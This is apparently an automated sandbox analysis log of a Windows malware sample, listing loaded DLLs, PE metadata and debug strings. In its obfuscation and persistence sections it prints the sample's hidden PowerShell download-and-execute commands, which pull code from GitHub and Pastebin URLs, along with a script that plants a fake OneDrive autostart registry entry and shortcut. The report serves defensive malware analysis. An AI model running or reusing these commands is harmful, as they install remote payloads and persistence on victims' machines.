Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: BeginSync.lnk.2.drLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: xK44OOt7vD.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: xK44OOt7vD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: xK44OOt7vD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: xK44OOt7vD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: xK44OOt7vD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: xK44OOt7vD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: xK44OOt7vD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: xK44OOt7vD.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: xK44OOt7vD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2794383361.0000012779D23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb' source: powershell.exe, 00000012.00000002.2794383361.0000012779D23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 0000000D.00000002.2703961662.00000205B6810000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000012.00000002.2793307610.0000012779CF9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb4e089 source: powershell.exe, 0000000D.00000002.2705160657.00000205B6AF8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb~ source: powershell.exe, 00000012.00000002.2794383361.0000012779D23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000012.00000002.2793307610.0000012779CF9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.2705160657.00000205B6AF8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2794383361.0000012779D23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 0000000D.00000002.2705160657.00000205B6AF8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2793307610.0000012779CF9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089x_e source: powershell.exe, 0000000D.00000002.2705160657.00000205B6AF8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.2705160657.00000205B6AF8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2793307610.0000012779CF9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000012.00000002.2793307610.0000012779CF9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbQv source: powershell.exe, 0000000D.00000002.2705160657.00000205B6AF8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdb" source: powershell.exe, 00000012.00000002.2794383361.0000012779D23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbll"( source: powershell.exe, 00000012.00000002.2763903950.00000127619CB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbmey source: powershell.exe, 00000012.00000002.2794383361.0000012779D23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbD source: powershell.exe, 00000012.00000002.2793307610.0000012779CF9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbll source: powershell.exe, 0000000D.00000002.2703961662.00000205B6810000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb^v source: powershell.exe, 0000000D.00000002.2705160657.00000205B6AF8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 0000000D.00000002.2705160657.00000205B6A92000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.2703961662.00000205B6770000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2764383354.0000012761A14000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Programming1\Cpscommand\x64\Release\Cpscommand.pdb source: xK44OOt7vD.exe
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000D.00000002.2705160657.00000205B6A92000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2794383361.0000012779D23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000012.00000002.2794383361.0000012779D23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000012.00000002.2793307610.0000012779CF9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbGv source: powershell.exe, 0000000D.00000002.2705160657.00000205B6AF8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbows\ source: powershell.exe, 00000012.00000002.2793307610.0000012779CF9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb; source: powershell.exe, 0000000D.00000002.2705160657.00000205B6A92000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000D.00000002.2705160657.00000205B6AF8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 0000000D.00000002.2705160657.00000205B6AF8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2794282634.0000012779D15000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb) source: powershell.exe, 00000012.00000002.2794383361.0000012779D23000.00000004.00000020.00020000.00000000.sdmp
Source: xK44OOt7vD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: xK44OOt7vD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: xK44OOt7vD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: xK44OOt7vD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: xK44OOt7vD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Users\user\Desktop\xK44OOt7vD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txt -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\xK44OOt7vD.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm3.txt -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: Stand_Trainer_Updated.exe.2.drStatic PE information: 0xEDF7F89D [Fri Jul 6 22:13:49 2096 UTC]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rlfwipso\rlfwipso.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rlfwipso\rlfwipso.cmdline"Jump to behavior
Source: xK44OOt7vD.exeStatic PE information: section name: _RDATA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848A50540 push eax; retf 13_2_00007FF848A505FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848A50625 push eax; retf 13_2_00007FF848A505FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848B26DC3 push edi; iretd 13_2_00007FF848B26DC6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848B2A08D pushad ; retf 13_2_00007FF848B2A0B1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848B2A0B3 pushad ; retf 13_2_00007FF848B2A0B1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\rlfwipso\rlfwipso.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Backend.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeJump to dropped file

Boot Survival

barindex
Powershell creates an autostart link
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,